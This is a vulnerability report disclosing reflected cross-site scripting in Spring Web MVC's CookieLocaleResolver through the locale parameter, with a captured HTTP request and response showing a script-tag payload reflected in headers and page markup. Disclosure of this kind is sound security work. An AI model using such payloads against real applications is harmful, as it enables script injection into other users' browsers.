Details
Major Description
In my current work, I have discovered many web application using the CookieLocaleResolver and as a consequence vulnerable to reflected cross-site scripting attacks.
It occurs because the user-controllable GET request parameter language is not properly validated. As a result, it is possible to inject arbitrary JavaScript into the application's response.
I'm not sure if it is a Spring MVC flaw and the exact affected release.
*EDIT*: It concerns Spring Web MVC and NOT Spring ROO but I cannot find the related component.
Find below a real-world HTTP request and response extracted from a internal web application:
HTPP request
GET /*CENSORED*/test/frontoffice/welcome.do?locale=en"><script>alert(1)</script>7767e2a3bc6 HTTP/1.1 Host: *CENSORED*:1031 Cookie: JSESSIONID=Rv62Q9JS8CPDD1LqNMV1M77RzFBN9GVMNJBfd1WKSHgFNNDLyzS7!115391691; org.springframework.web.servlet.i18n.CookieLocaleResolver.LOCALE=en Connection: keep-alive
HTPP response snippet
HTTP/1.1 200 OK Date: Mon, 21 Jan 2013 09:24:56 GMT Content-Type: text/html;charset=UTF-8 Set-Cookie: org.springframework.web.servlet.i18n.CookieLocaleResolver.LOCALE= en"><script>alert(1)</script>7767e2a3bc6; expires=Sat, 08-Feb-2081 12:39:06 GMT; path=/ Content-Language: en"><script>alert(1)</script>7767e2a3bc6 X-Powered-By: Servlet/2.5 JSP/2.1 (...) <script type="text/javascript" src="/*CENSORED*/test/frontoffice/scripts/ergonomics/jsCalendar/lang/calendar-en"><script>alert(1)</script>7767e2a3bc6.js"></script>
Please find enclosed a Maven project including a Junit test with spring-webmvc and spring-test 3.2.0.RELEASE.
Best regards
Omar EL MANDOUR
